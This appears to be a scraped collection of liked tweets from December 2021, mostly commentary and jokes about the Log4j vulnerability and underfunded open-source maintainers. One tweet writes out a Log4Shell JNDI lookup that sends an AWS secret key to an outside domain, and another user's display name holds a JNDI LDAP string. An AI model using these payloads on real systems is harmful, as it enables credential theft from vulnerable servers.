Kind likes

https://twitter.com/BlueLightAlarm/status/1470333871476641793

Omg stop they’ve made 1 tweet

Adam (@adamrbrts)Mon, 13 Dec 2021 10:06 GMT

A rare insightful comment on the orange site: news.ycombinator.com/item?id=295252… "Open source is not broken".

Danack (@MrDanack)Sun, 12 Dec 2021 22:11 GMT

The eruption of The Fagradalsfjall volcano, Iceland. Photo by Arnar Kristjansson

Diane Doniol-Valcroze (@ddoniolvalcroze)Sun, 12 Dec 2021 17:07 GMT

To everyone astonished at how wide-spread Java usage really is: what you've just seen is just the stuff using Log4J2. ;)

Lars Rosenquist (@larsrosenquist)Sun, 12 Dec 2021 11:24 GMT

don't forget you can get those sweet environment variables ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

DilDog (@dildog)Sat, 11 Dec 2021 21:48 GMT

A whole lot of engineers worked all weekend and deserve the week off. Friendly reminder that you should give it to them.

emily freeman (@editingemily)Mon, 13 Dec 2021 06:06 GMT

Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.

Matthew Prince 🌥 (@eastdakota)Sat, 11 Dec 2021 22:47 GMT

I’ve tried very hard to find out who made this but it sadly just pops up on Imgur without any credits. So, with that disclaimer made, I desperately need people to know that I *love* this.

Charble Garble 🏳️‍🌈🇸🇪 (@charlottegore)Sat, 11 Dec 2021 21:39 GMT

Been thinking about the maintainers of log4j2 a ton this weekend. I'm so thankful for open source. While I get to maintain projects with support from my employer - most do this entirely with spare time Maintainers deserve our thanks (and sponsorships!) for their work 🤗🙏

Jeff Hollan (@jeffhollan)Sun, 12 Dec 2021 17:16 GMT

Something I do every December is clear out my Pocket queue and YouTube watch later list I spend a lot of time reading all the articles I’ve been putting off or I delete them It feels so nice starting a new year with no backlog. Highly recommend 🤘

Justin Garrison (@rothgar)Mon, 13 Dec 2021 06:23 GMT

Please tell me I'm not the only one who sees it. 😭 You see it, right? RIGHT?

Marjorie🧁 (@NotLargeMarge1)Thu, 09 Dec 2021 22:35 GMT

uh they absolutely do

Luke Plunkett (@LukePlunkett)Sun, 12 Dec 2021 20:38 GMT

This Christmas we're burning Yule Log4js

Richard Westmoreland  (@RSWestmoreland)Fri, 10 Dec 2021 21:18 GMT

Real talk: Garak was such a great combination of character & actor that he almost transcended the show & even Star Trek itself. They basically put an ambiguously gay John le Carré antihero into the middle of a space opera.

Post details

I'm dead.

MTN DEW: Spider Juice (@MtnDewJitsu)Sun, 12 Dec 2021 13:42 GMT

Zack Stentz (@MuseZack)Mon, 13 Dec 2021 02:23 GMT

I'm dead.

MTN DEW: Spider Juice (@MtnDewJitsu)Sun, 12 Dec 2021 13:42 GMT

Interviewer: Can you explain the gap in your CV? Me: I spent 6 hours formatting it in Google Docs and you've opened it in Word.

Clarissa Maycock (@ClarissaDM)Fri, 03 Sep 2021 10:40 +0000

We don’t need everyone to upgrade log4j, just enough for herd immunity to takeover

Ricky (@rickhanlonii)Sun, 12 Dec 2021 16:55 GMT

https://twitter.com/liran_tal/status/1469770636356722688

Pretty much every day for the last 10 years.

Dio Rettori (@rettori)Sat, 11 Dec 2021 20:58 GMT

Joining a union is a good idea anyway. So you should do that. I'm a member of @ProspectUnion. Who are best choice of the well established unions in the UK if you work in tech.

Post details

https://twitter.com/rjw1/status/1470139005559881733

We all join a union who uses the subs to pay maintainers (how we decide what needs maintaining becomes an issue)

bob (@rjw1)Sun, 12 Dec 2021 21:10 GMT

bob (@rjw1)Sun, 12 Dec 2021 21:44 GMT

Log4j recap - two random unpaid folk maintain the code - a random requested the vuln/feature in 2013 - major IT and security vendors rely on that code - problem was publicised by teens in Minecraft video game - scope of problem still unclear days later

Kevin Beaumont (@GossiTheDog)Sun, 12 Dec 2021 01:14 GMT

my friend told me halfway through giving birth she was like “I can’t do this, I simply cannot do this?” and they were like “oh you have to” and life is just like that all the time

SANDWORM (@christapeterso)Fri, 10 Dec 2021 09:30 GMT

The festive season is treating Terry’s chocolate orange as one of your five-a-day

Rebekah (@rkulidzan)Sun, 12 Dec 2021 13:22 GMT

https://twitter.com/ZiziFothSi/status/1469994367691763714

FLIRT LIZARD GONNA GET SOME HOLODICK

Katie (@ZiziFothSi)Sun, 12 Dec 2021 11:38 GMT

My #log4j status/tracking page is a little rough in spots, but the list of affected, claimed unaffected, and not-sure-yet products is getting the full undue diligence: techsolvency.com/story-so-far/c…

Royce Williams (@TychoTithonus)Sat, 11 Dec 2021 06:21 GMT

Consciously identifying that I have been talking solo for far too long at the zoom call but I have no idea how to wind this down so I just shout HAHA THAYS IT LIKE COMMENT AND SUBSCRIBE and throw my work laptop out of the window

laura with the red nose and the antlers (@freezydorito)Sun, 12 Dec 2021 11:48 GMT

Another chronically underfunded OSS library in the news. It’s simple: - Using OSS to make money? Fund it! - Want to see an OSS project advance? Fund it! - Want to help your dependencies succeed so you can hire people experienced in them? Fund them! NORMALIZE FUNDING OSS.

twitter.com/benjie/status/…

Post details

Why not take 5% of your engineering budget and invest it in the various open source projects you depend on? I'd hazard the returns you'd see over the coming years from this investment would be greater than having spent that same amount on payroll.

Benjie 🐘 (@Benjie)Thu, 18 Jun 2020 13:18 +0000

Benjie 🐘 (@Benjie)Sun, 12 Dec 2021 10:05 GMT

If you have a #Maven parent POM for your org or project, here's an enforcer rule to put into it which will ban any current of future usage of vulnerable #log4j2 versions. gist.github.com/gunnarmorling/…

Gunnar Morling 🌍 (@gunnarmorling)Sat, 11 Dec 2021 09:42 GMT

https://twitter.com/HOOKFanAcct/status/1469906909583097857

You deserve to get jumped

ASHUTOSH #GoGHC #PissariSTRONG 🥶🥶 (@PuroNerdAsh)Sun, 12 Dec 2021 05:49 GMT

a bad movie that’s entertaining is better than a good movie that’s boring

Post details

What movie opinion will get you jumped like this?

chu (@chuuzus)Sat, 11 Dec 2021 15:08 GMT

🌘 (@photonblasters)Sat, 11 Dec 2021 18:50 GMT

We all agree the status quo is unsustainable. Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession. The thing is, companies need it as much as maintainers do. blog.filippo.io/professional-m…

Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Sat, 11 Dec 2021 19:22 GMT

from @BlackHatEvents USA 2016: A Journey From #JNDI/LDAP Manipulation to Remote Code Execution Dream Land by @pwntester and @olekmirosh blackhat.com/docs/us-16/mat… now the exploit vector presented in 2016 is the #log4jRCE. attached slide #11 from the presentation below. :)

an0n (@an0n_r0)Sat, 11 Dec 2021 12:23 GMT

since everyone is talking about log4j/supply chains an experiment years ago i calculated 1-bit offset utf8 strings of the top few hundred npm packages and registered packages under them they received thousands of hits per week from machines trying to download and execute them

suzuha (@dystopiabreaker)Sat, 11 Dec 2021 08:06 GMT

developer pro tip: the best way to prevent log4j from executing shell commands or querying LDAP is to not allow any user input of any kind

laserllama (@laserllama)Sun, 12 Dec 2021 03:32 GMT

RT @reathchris as a user i want you to leave me alone

A Christmas Carol 🎄 (@CarolSaysThings)Fri, 10 Dec 2021 07:49 GMT

RT @Ryan_Ken_Acts I perpetually feel like I’m 2 to 3 good back cracks from knowing true peace

A Christmas Carol 🎄 (@CarolSaysThings)Fri, 10 Dec 2021 07:38 GMT

Gotta love Hermes: “We left the parcel on your porch” In the picture: not my gd porch 😒

A Christmas Carol 🎄 (@CarolSaysThings)Fri, 10 Dec 2021 17:40 GMT

RT @UrbanNathalia

A Christmas Carol 🎄 (@CarolSaysThings)Thu, 09 Dec 2021 22:38 GMT

we’re calling this thing the Yule Log4j, right? cuz in the dark of winter we’ve gathered together to watch it burn?

gemily son of glóin (@themortalemily)Sat, 11 Dec 2021 18:23 GMT

Running Tycho?

Post details

Any Theories?? #TheExpanse #ScreamingFirehawks #TheExpanse601 #TheExpanseSeason6

The Discuss (@TheDiscussPod)Sat, 11 Dec 2021 21:24 GMT

James S.A. Corey (@JamesSACorey)Sat, 11 Dec 2021 22:41 GMT

Maintainable open source is not an easily solved problem. And yet most of our tech stacks would shut down if open source code was all of a sudden unavailable.

Laurie (@laurieontech)Sat, 11 Dec 2021 22:44 GMT

As someone who does this quite often, they are not ignoring you. They are overwhelmed. They are forgetful. They are trying to figure out what it means to care for themselves and actually do it. They do not hate you. They, in fact, probably miss you.

Amy Gaeta (@GaetaAmy)Wed, 08 Dec 2021 03:37 GMT

there is a cat!!! at this party!!! twitter.com/himaisie/statu…

Post details

party outfit

maisie 🔔 🏳️‍⚧️ (@hiMaisie)Sat, 11 Dec 2021 12:56 GMT

maisie 🔔 🏳️‍⚧️ (@hiMaisie)Sat, 11 Dec 2021 21:57 GMT

The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way.

Post details

Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. twitter.com/shipilev/statu…

Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT

Catalin Cimpanu (@campuscodi)Sat, 11 Dec 2021 17:41 GMT

It took me about 5 minutes to start locally running an open source Ruby project despite the fact that I never touched Ruby on Rails in the past & project itself didn’t have related docs. Now that’s what I call strong external community resources that are easy to find 👏

Cake is Kate. Always has been 💫 (@kefimochi)Sat, 11 Dec 2021 23:27 GMT